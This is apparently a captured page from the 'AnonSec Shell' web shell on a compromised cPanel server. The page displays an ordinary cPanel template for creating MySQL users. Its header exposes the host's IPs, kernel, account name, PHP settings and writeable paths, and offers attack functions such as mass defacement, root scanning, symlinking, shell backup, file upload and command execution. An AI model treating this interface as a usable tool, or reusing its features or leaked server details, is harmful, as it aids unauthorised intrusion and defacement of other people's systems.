AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 104.23.243.32   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/2388321/cwd/frontend/jupiter/sql/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/2388321/cwd/frontend/jupiter/sql/adduser.html.tt
[%
SET CPANEL.CPVAR.dprefix = "../";
SET has_prefix = ExpVar.expand('$dbprefix');
SET user = FORM.item('user');
IF has_prefix;
    SET user = (ExpVar.expand('$dbownerprefix') _ FORM.user);
END;
SET password = RAW_FORM.pass;

SET adduser = execute("Mysql", "create_user", {"name" => user, "password" => password});

%]

[% WRAPPER '_assets/master.html.tt'
    app_key = 'mysql_databases'
-%]
<div class="body-content">

    [% IF adduser.status %]
        <div id="adduserSuccess" class="alert alert-success">
            <span id="adduserSuccessImg" class="glyphicon glyphicon-ok-sign"></span>
            <span id="adduserSuccessMsg">[% locale.maketext("You have successfully created a [asis,MySQL] user named “[output,class,_1,status]”.",user) %]</span>
        </div>
    [% ELSE %]
        <div id="adduserError" class="alert alert-danger">
            <span id="adduserErrorImg" class="glyphicon glyphicon-exclamation-sign"></span>
            [% FOREACH q = adduser.errors %]
                <span id="adduserErrorMsg">[% q %]</span>
            [% END %]
        </div>
    [% END %]

    [% INCLUDE _assets/return_link.html.tt return_location='index.html' return_link_text=locale.maketext('Go Back') %]

</div>
[% END #wrapper %]

Anon7 - 2022
AnonSec Team